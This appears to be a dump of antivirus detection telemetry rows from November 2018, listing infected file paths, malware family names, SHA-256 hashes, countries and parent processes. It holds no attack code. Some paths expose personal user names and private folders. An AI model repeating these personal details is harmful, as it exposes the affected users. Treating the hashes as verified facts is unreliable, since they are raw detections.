  Row(detection=Row(filename='mshta.exe', filepath='\\\\?\\C:\\Windows\\System32\\mshta.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='4c9c09885d6c35cbb5dcaccb219359e6564d57d20c82ede932a2673004536170', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='631160.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\631160.exe', filesize=1536000, name='TR/Crypt.TPM.Gen.#M300.#R2864'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T19:09:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001b24', filepath='C:\\Windows\\Temp\\tmp00000308\\tmp00001b24', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T13:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vwtester.exe', filepath='E:\\VW-Software\\VAG_K+CAN_Commander_v2.5\\VWTESTER.EXE', filesize=512000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100871'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:26:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_22_7_1.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_22_7_1.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='7a6d991a4d35e4af36e478eac2f12b9ecc19b4b06e6f00386b2b2b5a511c62f4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235201-fbd33445', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181101-235201-FBD33445', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:52:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C3A1132288E96FE91A32C23FC02893891960B16442999556138D832D835C4A18', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3a1132288e96fe91a32c23fc02893891960b16442999556138d832d835c4a18', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3336.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3336.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143124-08a6cfbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143124-08A6CFBD', filesize=5620000, name='WORM/Lodbak.Gen4.#M1.#R1'), hash='953564fa4d60dfb5b9b175e1f300ee9ce48928631da591f0f8411695711fb1ac', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:32:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T13:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='abrites commander for ford.exe', filepath='\\\\?\\C:\\Program Files\\ABRITES software for ID 173309\\Ford\\ABRITES Commander for Ford.exe', filesize=7168000, name='HEUR/APC.#M1.#R1'), hash='e2016a8f61c15545efa743b1e8b889dd4812968794a8b1b64342682422c01c16', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:12:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riqualifica asa in oss.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\RIQUALIFICA ASA in OSS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-231853-0e2c8502', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c51b3d3b\\AVSCAN-20181031-231802-04960F6B\\AVSCAN-20181031-231853-0E2C8502', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='comunicazione bilancio di competenze.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\COMUNICAZIONE BILANCIO DI COMPETENZE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qppleesh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\qPPLEEsH.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\5vvvl1ffmnl\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กิจกรรมลูกเสือ บคว 53-54.exe', filepath='E:\\picture\\กิจกรรมลูกเสือ บคว 53-54\\กิจกรรมลูกเสือ บคว 53-54.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='88bfa11cb1bfe7ecc18e86cfa597b4bbfb27f24b9be42b692e98a80d5aa0eec5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='veneto.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\VENETO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dqyvqdff.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\dQyvqdff.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support prt.exe', filepath='F:\\Support PRT.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:06:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094108-d8974df4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094108-D8974DF4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b8955ff8331d9364fcecad68af94784da6e675b61e2f9e6ecf2b9ba588b576d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T19:04:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ofbyfzmj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\oFBYFZMJ.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172720-dab8b57b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172720-DAB8B57B', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='f0a12a2efa6cea8c31fbaea349afd34cf9d5caf5731525dd0e4293c56e28efcf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194537-4277c1d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194537-4277C1D3', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nscFB81.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Fotor3_3.4.1(163.15)_win32_x64_cnet.exe', parentsize=268417928, timestamp='2018-11-01T19:53:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095141-51dc9ac9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095141-51DC9AC9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151551-acd540f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-151551-ACD540F7', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-04T11:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='order #5011-b6109 .xls', filepath='/Users/henry/Library/Mail/V5/15D710C1-7C3E-4CF6-8795-49BF44D3F973/INBOX.mbox/Spam.mbox/C532A685-C674-4B2A-BA9D-362A91670AFF/Data/5/8/Attachments/85276/2/Order #5011-B6109 .xls', filesize=64000, name='X97M/Agent.76545964.#M0.#R0'), hash='039949bfb477668fd4b8397c1bf8593d4e4d6ea4eda54d7da86c2f1e449e4351', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001524-803b2bdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001524-803B2BDC', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:45:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092416-e07b2bc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-092416-E07B2BC3', filesize=640000, name='HEUR/AGEN.1025940.#M1.#R1'), hash='36b50d5c4cd2465b289c9f9b0ebe70dc4f0c1e6c8ba4c9e3c091109d8bf437ac', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:24:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T02:24:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-06-16-44.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T03:56:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T22:19:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T18:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131231-1d01d253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131231-1D01D253', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='removeassinaturapramim.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-135054479-2081261742-1868294817-1002\\$RFWHQRM\\RemoveAssinaturaPraMim.exe', filesize=512000, name='TR/Spy.Banker.Gen.#M300.#R3644'), hash='6f1e01d3c6ba1641c7b10604ac1c392b8133912c6b04f8a6d9c4750ebb5c15e6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:37:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bluesportscan.exe', filepath='F:\\software-gneral\\Red_Wifi\\BluesPortScan\\BluesPortScan.exe', filesize=256000, name='SPR/Tool.PScan.#M1.#R1'), hash='1fe30670ac6d4917965c71d1f43fe74d9ad44a8dfc58f859863635cd961e5edb', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T19:32:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_10d91d6c.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_10d91d6c.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_12166ab6.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_12166ab6.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:28:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\skse_1_06_16\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='17e26c7fc5bae6864a898278a4229b223706b7e2ab7b7ab543f0d06c46223503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:EditMDor1US2cMTk.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T08:46:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\McAfee\\VirusScan Enterprise\\x64\\McShield.exe', parentsize=181480, timestamp='2018-11-04T22:57:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5447ded3f16b87a2029d96fb8250dc1f9f0fa0e9', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\UoefjClp.default\\cache2\\entries\\5447DED3F16B87A2029D96FB8250DC1F9F0FA0E9', filesize=656000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='24a62d9c6398505911ae927f23b616458b4b7a4798a7949187d8f12c88ab1380', metadata=Row(cmdline='-os-restarted', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-04T08:31:58Z'), dt=datetime.date(2018, 11, 4)),
